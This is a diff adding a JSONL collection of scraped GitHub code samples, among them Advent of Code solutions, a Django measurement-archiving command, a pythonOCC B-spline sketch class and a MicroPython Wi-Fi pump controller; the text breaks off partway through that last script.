diff --git "a/2453.jsonl" "b/2453.jsonl" new file mode 100644--- /dev/null +++ "b/2453.jsonl" @@ -0,0 +1,1477 @@ +{"seq_id":"5356058332","text":"import unittest\nfrom pathlib import Path\n\nfrom src import load_data\nfrom src.day06 import DatastreamBuffer, parse\n\n\nclass Day06Tests(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.examples = [\n parse(d)\n for d in load_data(Path(__file__).parent / \"resources/day06/example.txt\")\n ]\n cls.input = parse(\n load_data(Path(__file__).parent / \"../src/day06/input.txt\")[0]\n )\n\n def test_load_example(self):\n self.assertEqual(\n self.examples,\n [\n DatastreamBuffer(\"mjqjpqmgbljsphdztnvjfqwrcgsmlb\"),\n DatastreamBuffer(\"bvwbjplbgvbhsrlpgdmjqwftvncz\"),\n DatastreamBuffer(\"nppdvjthqldpwncqszvftbrmjlhg\"),\n DatastreamBuffer(\"nznrnfrfntjfmvfwmzdfjlvtqnbhcprsg\"),\n DatastreamBuffer(\"zcfzfwzzqfrljwzlrfnpqdbhtmscgvjw\"),\n ],\n )\n\n def test_first_start_of_packet_marker(self):\n self.assertEqual(\n [ex.first_start_of_packet_marker for ex in self.examples], [7, 5, 6, 10, 11]\n )\n\n def test_first_start_of_message_marker(self):\n self.assertEqual(\n [ex.first_start_of_message_marker for ex in self.examples],\n [19, 23, 23, 29, 26],\n )\n\n def test_solution(self):\n self.assertEqual(1802, self.input.first_start_of_packet_marker)\n self.assertEqual(3551, self.input.first_start_of_message_marker)\n","repo_name":"tysonmcnulty/advent-of-code-2022","sub_path":"tests/test_day06.py","file_name":"test_day06.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42305491992","text":"import numpy as np\n\n\ndef movement(direction, distance):\n #will return (depth change ,horizontal change) dependent\n #on direction/distance\n travelled = int(distance)\n if direction == \"down\":\n return (travelled * 1, 0)\n elif direction == \"up\":\n return (travelled * -1, 0)\n elif direction == \"forward\":\n return (0, travelled)\n else:\n return (0,0)\n\ndepth = 0\nhorizontal = 0\ninput = 'd2_input.txt'\nmy_file_handle=open(input)\ndata = my_file_handle.read().split('\\n')\n\nformat_data = [line.split() for line in data]\nformat_data.pop()\nprint(format_data)\n #formats to [distance,change]\nfor dir,dist in format_data:\n depth_change, horiz_change = movement(dir,dist)\n depth += depth_change \n horizontal += horiz_change\nprint((horizontal*depth))\n","repo_name":"connorjsullivan/advent-of-code-2021","sub_path":"d2.py","file_name":"d2.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17567079299","text":"with open(\"text.txt\",\"r\") as file,open('result.txt','w') as result:\n index = 1\n marks = {'.','?','!',',',':',';','-','-','‘',\"'\"}\n lines = file.read().splitlines()\n for line in lines:\n letters = 0\n punctuation_marks = 0\n for ch in line:\n if ch in marks:\n punctuation_marks+=1\n elif ch.isalpha():\n letters+=1\n result.write (f\"Line {index}: {line.strip()} ({letters})({punctuation_marks})\")\n result.write('\\n')\n index+=1","repo_name":"ilias511/Advanced","sub_path":"file_handling_line_nums/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"40953274871","text":"import sys\nfrom unittest import TextTestRunner, TestLoader\nfrom tests.settings import set_up, tear_down\n\ntest_file_pattern = 
'test*.py'\n\nif len(sys.argv) == 2:\n test_file_pattern = 'test*{}*.py'.format(sys.argv[1])\n\nset_up()\n\ntest_suite = TestLoader().discover('tests', pattern=test_file_pattern, top_level_dir='.')\nrunner = TextTestRunner(stream=sys.stdout, verbosity=1)\nresult = runner.run(test_suite)\n\ntear_down()\n\nsys.exit(len(result.failures))\n","repo_name":"R0land013/blue-pos","sub_path":"runtests.py","file_name":"runtests.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"75"} +{"seq_id":"9696733794","text":"from cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import ed25519\n\n# sender: hexadecimal representation of the public key of the sender\n# recipient: hexadecimal representation of the public key of the recipient\n# amount: amount of coins to be transferred\n# signature: hexadecimal representation of the signature of the transaction\nclass Transaction:\n def __init__(self, sender_adress: str, recipient_adress: str, amount: int, signature: str) :\n self.sender_address = sender_adress\n self.recipient_address = recipient_adress\n self.amount = amount\n self.signature = signature\n \n def serialize(self):\n return {\n \"sender_address\": self.sender_address,\n \"recipient_address\": self.recipient_address,\n \"amount\": self.amount,\n \"signature\": self.signature\n }","repo_name":"tpicaud/put-blockchain-implementation","sub_path":"wallet/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30074575928","text":"#!/usr/bin/env python\n\nfrom pybuiltingrapher import graph, create_fake\nfrom pybuiltingrapher.stdlib_modules import modules\n\nimport argparse\nimport json\nimport sys\nimport os\n\n# Command Line invocation\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Grapher for modules in python standard lib, intended to be used for modules written in C.\")\n parser.add_argument(\"cpythondir\", help=\"The root directory of the CPython repository. Should have a Modules folder in it.\")\n parser.add_argument(\"--skipinternal\", help=\"Include modules whose names start with an underscore.\", action=\"store_true\")\n\n parser.add_argument(\"--generatefakes\", help=\"Creates fake .py modules that mimics the builtin - for tricking PySonar.\", action=\"store_true\")\n parser.add_argument(\"--fakesdir\", help=\"Directory in which to place the fake py modules. 
Default: cpythondir/Fakes/\", type=str, default=None)\n\n args = parser.parse_args()\n\n symbols = []\n docs = []\n refs = []\n\n # Setup directory for generating fakes\n if args.fakesdir == None:\n args.fakesdir = args.cpythondir + '/Fakes/'\n if args.generatefakes:\n if not os.path.exists(args.fakesdir):\n os.makedirs(args.fakesdir)\n\n for module,filename in modules.items():\n #If skipinternal flag was not passed, skip modules starting with an underscore\n if args.skipinternal and module[0] == \"_\":\n continue\n\n try:\n module_symbols, module_docs, module_refs = graph(module, args.cpythondir, filename)\n\n if args.generatefakes:\n f = open(args.fakesdir + module + \".py\", 'w')\n f.write(create_fake(module))\n f.close()\n except:\n # If error occured, simply ignore module\n sys.stderr.write(str(sys.exc_info()) + \"\\n\")\n pass\n else:\n symbols.extend(module_symbols)\n docs.extend(module_docs)\n refs.extend(module_refs)\n\n print(json.dumps({\n \"Symbols\" : symbols,\n \"Docs\" : docs,\n \"Refs\" : refs\n }))\n","repo_name":"pombreda/pybuiltingrapher","sub_path":"graphstdlib.py","file_name":"graphstdlib.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4850927286","text":"from .sketch_geometry import *\nfrom .sketch_point import Sketch_Point\n\n\nclass Sketch_Bspline(Sketch_Geometry):\n IndexCounter = 0\n\n def __init__(self, theContext, theAxis):\n super(Sketch_Bspline, self).__init__(\"Bspline\", theContext, theAxis)\n Sketch_Bspline.IndexCounter += 1\n self.myName = \"Bspline\" + str(self.IndexCounter)\n self.myGeometry: Geom_BSplineCurve = None\n self.myGeometry2d: Geom2d_BSplineCurve = None\n self.myAIS_InteractiveObject: AIS_Shape = None\n self.myAIS_Lines = []\n self.myPoles = []\n self.myWeights = []\n self.myKnots = []\n self.myMultiplicities = []\n self.myDegree = 2\n self.myPeriodicFlag = False\n self.TypeInterpolation = False\n\n def AddPoles(self, thePnt2d, weight=1.0):\n # set poles\n sketch_point = Sketch_Point(self.myContext, self.curCoordinateSystem)\n sketch_point.Compute(thePnt2d)\n # auxiliry lines\n if len(self.myPoles) >= 1:\n ais_line: AIS_Line = AIS_Line(self.myPoles[-1].GetGeometry(), sketch_point.GetGeometry())\n ais_line.SetAttributes(self.myDrawer)\n self.myAIS_Lines.append(ais_line)\n self.myContext.Display(ais_line, True)\n # set weight\n self.myPoles.append(sketch_point)\n self.myWeights.append(weight)\n\n def RemoveDisplay(self):\n super(Sketch_Bspline, self).RemoveDisplay()\n for point in self.myPoles:\n point.RemoveDisplay()\n for line in self.myAIS_Lines:\n self.myContext.Remove(line, True)\n\n def Compute(self):\n arrayOfWeights = float_list_to_TColStd_Array1OfReal(self.myWeights)\n arrayOfKnots = float_list_to_TColStd_Array1OfReal(self.myKnots)\n arrayOfMulties = int_list_to_TColStd_Array1OfInteger(self.myMultiplicities)\n\n poles2d_list = [pole.GetGeometry2d().Pnt2d() for pole in self.myPoles]\n arrayOfPoles2d = point_list_to_TColgp_Array1OfPnt2d(poles2d_list)\n self.myGeometry2d = Geom2d_BSplineCurve(arrayOfPoles2d, arrayOfWeights, arrayOfKnots, arrayOfMulties,\n self.myDegree)\n\n poles_list = [pole.GetGeometry().Pnt() for pole in self.myPoles]\n arrayOfPoles = point_list_to_TColgp_Array1OfPnt(poles_list)\n self.myGeometry = Geom_BSplineCurve(arrayOfPoles, arrayOfWeights, arrayOfKnots, arrayOfMulties, self.myDegree)\n edge = BRepBuilderAPI_MakeEdge(self.myGeometry)\n if self.myAIS_InteractiveObject:\n 
self.myAIS_InteractiveObject.SetShape(edge.Edge())\n self.myAIS_InteractiveObject.Redisplay(True)\n else:\n self.myAIS_InteractiveObject = AIS_Shape(edge.Edge())\n self.myAIS_InteractiveObject.SetAttributes(self.myDrawer)\n self.myContext.Display(self.myAIS_InteractiveObject, True)\n\n def FromShape(self, theGeom: Geom_BSplineCurve, theShape):\n self.myGeometry = theGeom\n\n myPoles = TColgp_Array1OfPnt2d_to_point_list(self.myGeometry.Poles())\n poles2d_list = [projectPointOnPlane(pole, self.curCoordinateSystem) for pole in myPoles]\n arrayOfPoles2d = point_list_to_TColgp_Array1OfPnt2d(poles2d_list)\n\n for pnt2d in poles2d_list:\n self.AddPoles(pnt2d)\n if self.myGeometry.IsRational()==True:\n arrayOfWeights=self.myGeometry.Weights()\n else:\n arrayOfWeights = float_list_to_TColStd_Array1OfReal(self.myWeights)\n arrayOfKnots = self.myGeometry.Knots()\n arrayOfMulties = self.myGeometry.Multiplicities()\n degree=self.myGeometry.Degree()\n\n self.myGeometry2d = Geom2d_BSplineCurve(arrayOfPoles2d, arrayOfWeights, arrayOfKnots, arrayOfMulties,degree)\n\n self.myAIS_InteractiveObject = AIS_Shape(theShape)\n self.myAIS_InteractiveObject.SetAttributes(self.myDrawer)\n self.myContext.Display(self.myAIS_InteractiveObject, True)\n\n def ComputeInterpolation(self):\n self.TypeInterpolation = True\n poles2d_list = [pole.GetGeometry2d().Pnt2d() for pole in self.myPoles]\n arrayOfPoles2d = point_list_to_TColgp_Array1OfPnt2d(poles2d_list)\n self.myGeometry2d = Geom2dAPI_PointsToBSpline(arrayOfPoles2d)\n if self.myGeometry2d.IsDone():\n self.myGeometry2d = self.myGeometry2d.Curve()\n poles_list = [pole.GetGeometry().Pnt() for pole in self.myPoles]\n arrayOfPoles = point_list_to_TColgp_Array1OfPnt(poles_list)\n self.myGeometry = GeomAPI_PointsToBSpline(arrayOfPoles)\n if self.myGeometry.IsDone():\n self.myGeometry = self.myGeometry.Curve()\n edge = BRepBuilderAPI_MakeEdge(self.myGeometry)\n if self.myAIS_InteractiveObject:\n self.myAIS_InteractiveObject.SetShape(edge.Edge())\n self.myAIS_InteractiveObject.Redisplay(True)\n else:\n self.myAIS_InteractiveObject = AIS_Shape(edge.Edge())\n self.myAIS_InteractiveObject.SetAttributes(self.myDrawer)\n self.myContext.Display(self.myAIS_InteractiveObject, True)\n\n def DragTo(self, index, newPnt2d):\n self.myPoles[index].DragTo(newPnt2d)\n if self.TypeInterpolation:\n self.ComputeInterpolation()\n else:\n self.myPoles[index].DragTo(newPnt2d)\n pole2d = self.myPoles[index].GetGeometry2d().Pnt2d()\n pole = self.myPoles[index].GetGeometry().Pnt()\n self.myGeometry2d.SetPole(index + 1, pole2d, self.myWeights[index])\n self.myGeometry.SetPole(index + 1, pole, self.myWeights[index])\n self.myAIS_InteractiveObject.Redisplay(True)\n for line in self.myAIS_Lines:\n line.Redisplay(True)\n\n def Recompute(self):\n poles2d_list = [pole.GetGeometry2d().Pnt2d() for pole in self.myPoles]\n poles_list = [pole.GetGeometry().Pnt() for pole in self.myPoles]\n for index, pole2d in enumerate(poles2d_list):\n self.myGeometry2d.SetPole(index + 1, pole2d, self.myWeights[index])\n self.myGeometry.SetPole(index + 1, poles_list[index], self.myWeights[index])\n for index, knots in enumerate(self.myKnots):\n try:\n self.myGeometry2d.SetKnot(index + 1, knots, self.myMultiplicities[index])\n self.myGeometry.SetKnot(index + 1, knots, self.myMultiplicities[index])\n except Exception as e:\n break\n self.myAIS_InteractiveObject.Redisplay(True)\n\n def IncreaseDegree(self, theDegree):\n if theDegree < self.myGeometry2d.Degree():\n print(\"Degree elevation: degree can't be lower than 2 or lower than 
current degree\")\n else:\n self.RemoveLabel()\n self.myGeometry2d.IncreaseDegree(theDegree)\n self.myGeometry.IncreaseDegree(theDegree)\n self.myDegree = theDegree\n self.updateGeomAttributes()\n self.DisplayName()\n self.DisplayCoordinate()\n self.DisplayAuxiliryLine()\n self.myAIS_InteractiveObject.Redisplay(True)\n\n def IncreaseMultiplicity(self, theIndex, theMulti):\n self.myGeometry2d.IncreaseMultiplicity(theIndex, theMulti)\n self.myGeometry.IncreaseMultiplicity(theIndex, theMulti)\n self.myAIS_InteractiveObject.Redisplay(True)\n\n def updateGeomAttributes(self):\n poles2d_array = self.myGeometry2d.Poles()\n poles2d_list = TColgp_Array1OfPnt2d_to_point_list(poles2d_array)\n\n knots_array = self.myGeometry2d.Knots()\n multiplicity = self.myGeometry2d.Multiplicities()\n self.myKnots = TColStd_Array1OfNumber_to_list(knots_array)\n self.myMultiplicities = TColStd_Array1OfNumber_to_list(multiplicity)\n self.myPoles.clear()\n self.myWeights.clear()\n self.myAIS_Lines.clear()\n for new_point in poles2d_list:\n self.AddPoles(new_point)\n\n def SetPeriodic(self):\n if self.myGeometry2d.IsPeriodic() == False:\n self.myGeometry2d.SetPeriodic()\n self.myGeometry.SetPeriodic()\n else:\n self.myGeometry2d.SetNotPeriodic()\n self.myGeometry.SetNotPeriodic()\n self.RemoveLabel()\n self.updateGeomAttributes()\n # display the last lines\n if not self.myPoles[-1].GetGeometry().Pnt().IsEqual(self.myPoles[0].GetGeometry().Pnt(),pow(10,-6)):\n self.myContext.Remove(self.myAIS_Lines[-1], True)\n ais_line: AIS_Line = AIS_Line(self.myPoles[-1].GetGeometry(), self.myPoles[0].GetGeometry())\n ais_line.SetAttributes(self.myDrawer)\n self.myAIS_Lines.append(ais_line)\n self.myContext.Display(ais_line, True)\n self.DisplayName()\n self.DisplayCoordinate()\n self.DisplayAuxiliryLine()\n self.myAIS_InteractiveObject.Redisplay(True)\n\n def RemoveAIS_Lines(self):\n # remove auxiliry line\n for point in self.myPoles:\n point.RemoveDisplay()\n for line in self.myAIS_Lines:\n self.myContext.Remove(line, True)\n\n def GetGeometryType(self):\n return Sketch_GeometryType.CurveSketchObject\n\n def GetTypeOfMethod(self):\n return Sketch_ObjectTypeOfMethod.BSpline_Method\n\n def ChangeWeights(self, index, weight):\n self.myWeights[index] = weight\n\n def SetWeights(self, weights):\n self.myWeights = weights\n\n def GetWeights(self):\n return self.myWeights\n\n def SetMultiplicities(self, theMulti):\n self.myMultiplicities = theMulti\n\n def SetKnots(self, theKnots):\n self.myKnots = theKnots\n\n def GetKnots(self):\n return self.myKnots\n\n def SetMulties(self, theMulties):\n self.myMultiplicities = theMulties\n\n def ChangeMulties(self, index, multi):\n self.myMultiplicities[index] = multi\n\n def GetMulties(self):\n return self.myMultiplicities\n\n def GetPoles(self):\n return self.myPoles\n\n def SetPoles(self, thePoles):\n self.myPoles = list(thePoles)\n\n def SetDegree(self, theDegree):\n self.myDegree = theDegree\n\n def GetDegree(self):\n return self.myDegree\n\n def SetKnotsType(self, theType: int):\n # Non uniform type\n if theType == 0:\n pass\n # Uniform: if all the knots are of multiplicity 1,\n elif theType == 1:\n self.myMultiplicities, self.myKnots = setUniformKnots(len(self.myPoles), self.myDegree)\n # QuasiUniform: if all the knots are of multiplicity 1 except for the first and last knot which are of multiplicity Degree + 1,\n elif theType == 2:\n self.myMultiplicities, self.myKnots = setQuasiUniformKnots(len(self.myPoles), self.myDegree)\n # PiecewiseBezier: if the first and last knots have multiplicity 
Degree + 1 and if interior knots have multiplicity Degree A piecewise Bezier with only two knots is a BezierCurve. else the curve is non uniform.\n elif theType == 3:\n if len(self.myPoles) < 5:\n raise ValueError(\"Number of Poles must be greater than 5!\")\n else:\n self.myMultiplicities, self.myKnots = setPiecewiseBezierKnots(len(self.myPoles), self.myDegree)\n self.Compute()\n\n def DisplayName(self):\n if self.showViewportName:\n for point in self.myPoles:\n self.myContext.Display(point.myAIS_Name, True)\n else:\n for point in self.myPoles:\n self.myContext.Erase(point.myAIS_Name, True)\n\n def DisplayCoordinate(self):\n if self.showViewportCoordinate:\n for point in self.myPoles:\n self.myContext.Display(point.myAIS_Coordinate, True)\n else:\n for point in self.myPoles:\n self.myContext.Erase(point.myAIS_Coordinate, True)\n\n def DisplayAuxiliryLine(self):\n if self.showVieportAuxilirayLine:\n for point in self.myPoles:\n self.myContext.Display(point.GetAIS_Object(), True)\n for line in self.myAIS_Lines:\n self.myContext.Display(line, True)\n else:\n for point in self.myPoles:\n self.myContext.Erase(point.GetAIS_Object(), True)\n for line in self.myAIS_Lines:\n self.myContext.Erase(line, True)\n\n def GetStyle(self):\n return self.myWireStyle\n\n def SetStyle(self, theStyle):\n self.myWireStyle = theStyle\n self.myWireAspect.SetTypeOfLine(theStyle)\n\n def GetWidth(self):\n return self.myWireWidth\n\n def SetWidth(self, theWidth):\n self.myWireWidth = theWidth\n self.myWireAspect.SetWidth(theWidth)\n\n def GetColor(self):\n return self.myWireColor\n\n def SetColor(self, theColor):\n self.myWireColor = theColor\n self.myWireAspect.SetColor(Quantity_Color(theColor))\n\n def RemoveLabel(self):\n for point in self.myPoles:\n point.RemoveDisplay()\n point.RemoveLabel()\n for line in self.myAIS_Lines:\n self.myContext.Remove(line, True)\n","repo_name":"chen1180/CurveEditor_pythonOCC","sub_path":"data/sketch/geometry/sketch_bspline.py","file_name":"sketch_bspline.py","file_ext":"py","file_size_in_byte":12995,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"71230497842","text":"from django.core.management.base import BaseCommand\nfrom django.db.models import (Avg, StdDev, Min, Max, Count, F, FloatField,\n Value as V)\nfrom django.db.models.functions import (TruncDay, TruncMonth, TruncWeek,\n Coalesce, Concat)\nfrom measurement.models import (Measurement, ArchiveDay, ArchiveMonth,\n ArchiveWeek)\nfrom measurement.aggregates.percentile import Percentile\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta, MO\nimport pytz\n\n\nclass Command(BaseCommand):\n \"\"\" Command for creating archive entries\"\"\"\n\n help = 'Archives Measurements for the given time period'\n\n TIME_TRUNCATOR = {\n 'day': TruncDay,\n 'week': TruncWeek,\n 'month': TruncMonth,\n }\n \"\"\"\" Django datetime extractors for dealing with portions of datetimes \"\"\"\n\n DURATIONS = {\n 'day': lambda count: relativedelta(days=count),\n 'week': lambda count: relativedelta(weeks=count),\n 'month': lambda count: relativedelta(months=count),\n }\n \"\"\" functions for generating timesteps of sizes \"\"\"\n\n ARCHIVE_TYPE = {\n 'day': ArchiveDay,\n 'week': ArchiveWeek,\n 'month': ArchiveMonth\n }\n \"\"\" Types of archive \"\"\"\n\n def add_arguments(self, parser):\n parser.add_argument('archive_type',\n choices=['day', 'week', 'month'],\n help=('The granularity of the desired archive '\n '(i.e. 
day, week, month, etc.)'))\n parser.add_argument('--period_end',\n type=lambda s: pytz.utc.localize(\n datetime.strptime(s, \"%m-%d-%Y\")),\n nargs='?',\n default=datetime.now(tz=pytz.utc).replace(\n hour=0, minute=0, second=0, microsecond=0),\n help=('The end of the archiving period, '\n 'non-inclusive (format: mm-dd-yyyy)'))\n parser.add_argument('--metric', action='append',\n help='id of the metric to be archived',\n default=[])\n parser.add_argument('--no-overwrite', dest='overwrite',\n action='store_false')\n parser.add_argument('--overwrite', dest='overwrite',\n action='store_true')\n\n def handle(self, *args, **kwargs):\n # extract args\n archive_type = kwargs['archive_type']\n metrics = kwargs['metric']\n overwrite = kwargs['overwrite']\n period_end = kwargs['period_end']\n # in order to make archives for longer periods use backfill_archives,\n # which calls this command\n period_size = 1\n period_start = period_end - self.DURATIONS[archive_type](period_size)\n\n if archive_type == 'month':\n # if archive_type is month, adjust period start/end to go from 1st\n # day of the month\n period_end = period_end.replace(\n day=1, hour=0, minute=0, second=0, microsecond=0)\n period_start = period_start.replace(\n day=1, hour=0, minute=0, second=0, microsecond=0)\n elif archive_type == 'week':\n # if archive_type is week, adjust period start/end to go from\n # Monday of the given week\n period_end += relativedelta(hour=0, minute=0, second=0,\n microsecond=0, weekday=MO(-1))\n period_start += relativedelta(hour=0, minute=0, second=0,\n microsecond=0, weekday=MO(-1))\n\n # filter measurements down to time range\n measurements = Measurement.objects.filter(\n starttime__gte=period_start, starttime__lt=period_end)\n\n # if specific metrics were selected, filter for them\n if len(metrics) != 0:\n measurements = measurements.filter(metric__id__in=metrics)\n\n # get archives for same time period, to compare with measurements\n archives = self.ARCHIVE_TYPE[archive_type].objects.filter(\n starttime__gte=period_start, starttime__lt=period_end)\n\n # if overwriting archives, designate old ones to delete. Otherwise,\n # check to make sure we are only writing new ones\n if overwrite:\n n_archives_to_ignore = 0\n archives_to_delete = archives\n if len(metrics) != 0:\n archives_to_delete = archives_to_delete.filter(\n metric_id__in=metrics)\n else:\n # exclude measurements that already have archives. 
This only works\n # correctly for a single time period\n archive_key = archives.annotate(\n m_c=Concat('metric_id', V(' '), 'channel_id')).values('m_c')\n measurements = measurements.annotate(\n m_c=Concat('metric_id', V(' '), 'channel_id')).exclude(\n m_c__in=archive_key)\n # make sure we don't delete any old archives\n archives_to_delete = self.ARCHIVE_TYPE[archive_type].objects.none()\n n_archives_to_ignore = len(archive_key)\n\n # get the data to be archived\n archive_data = self.get_archive_data(measurements, archive_type)\n\n # delete old archives\n deleted_archives = archives_to_delete.delete()\n\n # create the archive entries\n created_archives = self.ARCHIVE_TYPE[archive_type].objects.bulk_create(\n [self.ARCHIVE_TYPE[archive_type](**archive)\n for archive in archive_data])\n\n # report back to user\n self.stdout.write(\n f\"Deleted {deleted_archives[0]}, \"\n f\"ignored {n_archives_to_ignore}, and \"\n f\"created {len(created_archives)} \"\n f\"{archive_type} archives \"\n f\"from {format(period_start, '%m-%d-%Y')} \"\n f\"to {format(period_end, '%m-%d-%Y')}\"\n )\n\n def get_archive_data(self, qs, archive_type):\n \"\"\" returns archives given a queryset \"\"\"\n # group on metric,channel, and time\n grouped_measurements = qs.annotate(\n # first truncate starttime to day/month so we can group on it\n time=self.TIME_TRUNCATOR[archive_type]('starttime')) \\\n .values('metric', 'channel', 'time')\n\n # calculate archive stats\n archive_data = grouped_measurements.annotate(\n mean=Avg('value'),\n median=Percentile('value', percentile=0.5),\n min=Min('value'),\n max=Max('value'),\n stdev=Coalesce(StdDev('value', sample=True), 0,\n output_field=FloatField()),\n num_samps=Count('value'),\n starttime=Min('starttime'),\n endtime=Max('endtime'),\n # add _id suffix to fields so they can be assigned to\n # Archive's fk directly\n metric_id=F('metric'),\n channel_id=F('channel'),\n p05=Percentile('value', percentile=0.05),\n p10=Percentile('value', percentile=0.10),\n p90=Percentile('value', percentile=0.90),\n p95=Percentile('value', percentile=0.95)\n )\n\n # select only columns that will be stored in Archive model\n filtered_archive_data = archive_data.values(\n 'channel_id', 'metric_id', 'min', 'max', 'mean',\n 'median', 'stdev', 'p05', 'p10', 'p90', 'p95',\n 'num_samps', 'starttime', 'endtime')\n\n return filtered_archive_data\n","repo_name":"pnsn/squacapi","sub_path":"app/measurement/management/commands/archive_measurements.py","file_name":"archive_measurements.py","file_ext":"py","file_size_in_byte":7601,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"2749216994","text":"# Create a dictionary named ProtocolsDict that will hold the following keys and values: {FTP: 21, DNS: 53, LDAP: 389, MySQL: 3306}\nprint(\"This program will display the port number of a given protocol.\\n\")\n\nProtocolsDict = {'FTP':'21', 'DNS':'53', 'LDAP':'389', 'MySQL':'3306'}\n# Create a variable named question that will ask the user for the name of a service using the input() function.\nquestion = input(\"For which protocol would you like to know the port number? 
\").upper() # upper() converts lowercase to uppercase\n# Create a condition to check if the value in the question variable exists in the dictionary.\n# It should be checked against the dictionary’s key list.\nif question in ProtocolsDict.keys():\n # Select a value from the dictionary with the question variable as a key\n answer = ProtocolsDict[question]\n # Print a message displaying the port associated with the selected service.\n print(\"The port number for protocol \" + question + \" is \" + answer + \"!\")\n# Finally, if the condition is not met, print a message that states that the protocol cannot be found.\nelse:\n print(\"The protocol can't be found\")\n","repo_name":"marcusacylar/course-labs","sub_path":"protocoldict.py","file_name":"protocoldict.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25115004100","text":"import time\n\nfrom cloth_manipulation.hardware.setup_hardware import setup_victor_louise\n\nvictor_louise = setup_victor_louise()\n\nvictor = victor_louise.left\nlouise = victor_louise.right\n\n\ndef check_gripper_and_motion(robot):\n # Check robot gripper\n robot.gripper.close()\n robot.gripper.open()\n\n # Check robot move to home\n robot.move_tcp(robot.home_pose)\n\n # Check robot move linear to out of way\n robot.move_tcp_linear(robot.out_of_way_pose, robot.LINEAR_SPEED, robot.LINEAR_ACCELERATION)\n\n\ncheck_gripper_and_motion(victor)\ncheck_gripper_and_motion(louise)\n\nvictor_louise.dual_gripper_close()\ntime.sleep(1)\nvictor_louise.dual_gripper_move_to_position(0.6)\ntime.sleep(1)\nvictor_louise.dual_gripper_open()\n\n\n# Check synchronous movement\nvictor_louise.dual_move_tcp(victor.home_pose, louise.home_pose)\nvictor_louise.dual_move_tcp(victor.out_of_way_pose, louise.out_of_way_pose)\n","repo_name":"Victorlouisdg/iros-2022-cloth-competition","sub_path":"cloth-manipulation/test/test_victor_louise.py","file_name":"test_victor_louise.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"30301173309","text":"import os,ROOT,math,array\n\nclass HistHelper(object):\n\tdef make_binning_with_stat_unc(self,inHists,statUnc):\n\t\tif len(inHists) == 0: raise RuntimeError\n\t\tnBins = inHists[0].GetNbinsX()\n\t\tbinContentDict = {}\n\t\tbinErrorDict = {}\n\t\tfor iHist,inHist in enumerate(inHists):\n\t\t\tbinContentDict[iHist] = 0.\n\t\t\tbinErrorDict[iHist] = 0.\n\n\t\txbins = []\n\t\tfor iBin in range(1,nBins+1):\n\t\t\tfor iHist,inHist in enumerate(inHists):\n\t\t\t\tbinContentDict[iHist] += inHist.GetBinContent(nBins+1-iBin)\n\t\t\t\tbinErrorDict[iHist] += inHist.GetBinError(nBins+1-iBin)**2\n\t\t\tif all([ binContent > 0. 
and math.sqrt(binErrorDict[iHist])/binContent <= statUnc for iHist,binContent in binContentDict.iteritems() ]):\n\t\t\t\tfor iHist,inHist in enumerate(inHists):\n\t\t\t\t\tbinContentDict[iHist] = 0.\n\t\t\t\t\tbinErrorDict[iHist] = 0.\n\t\t\t\txbins.append(inHists[0].GetXaxis().GetBinLowEdge(nBins+1-iBin))\n\t\tif xbins[-1] != 0: xbins.append(0.)\n\t\treturn xbins[::-1]\n\n\tdef convert_list_to_array(self,list):\n\t\treturn array.array('d',list)\n\n","repo_name":"lucien1011/PyNTupleProcessor","sub_path":"LJMet/StatTools/HistHelper.py","file_name":"HistHelper.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"11863649839","text":"import random\n\nclass Canvas:\n def __init__(self, height = 500, width = 500, density = 0.5, seed = 0):\n\n self.height = height\n self.width = width\n\n if seed != 0:\n random.seed(seed)\n else:\n random.seed()\n \n self.pixels = [[(1 if random.randint(1, int(1/density)) == 1 else 0) for i in range(0, self.height)] for j in range(0, self.width)]\n\n def step(self, automata):\n def calculate_pixel(i, j):\n internal_sum = 0\n for offset_y in range(-1,2):\n for offset_x in range(-1,2):\n if i + offset_y >= 0 and i + offset_y= 0 and j + offset_x 0:\n if wlan.status() < 0 or wlan.status() >= 3:\n break\n max_wait -= 1\n print('waiting for connection...')\n time.sleep(1)\n\n# Handle connection error\nif wlan.status() != 3:\n raise RuntimeError('network connection failed')\nelse:\n print('connected')\n status = wlan.ifconfig()\n print( 'ip = ' + status[0] )\n \n# Open socket\naddr = socket.getaddrinfo('0.0.0.0', 80)[0][-1]\n \ns = socket.socket()\ns.bind(addr)\ns.listen(1)\n \nprint('listening on', addr)\n\nstateis = \"\"\n \n# Listen for connections\nwhile True:\n try:\n cl, addr = s.accept()\n print('client connected from', addr)\n\n request = cl.recv(1024)\n\n request = str(request)\n led_on = request.find('/unpeu') # Variable based on the html link\n led_off = request.find('/beaucoup') # Variable based on the html link\n #print( 'led on = ' + str(led_on))\n #print( 'led off = ' + str(led_off))\n\n if led_on == 6:\n print(\"2 sec\")\n intled.value(1)\n pompe.value(1)\n utime.sleep(3)\n pompe.value(0)\n intled.value(0)\n stateis = \"La pompe fonctionne pendant 3 secondes\"\n\n elif led_off == 6:\n intled.value(1)\n pompe.value(1)\n utime.sleep(5)\n pompe.value(0)\n intled.value(0)\n stateis = \"La pompe fonctionne pendant 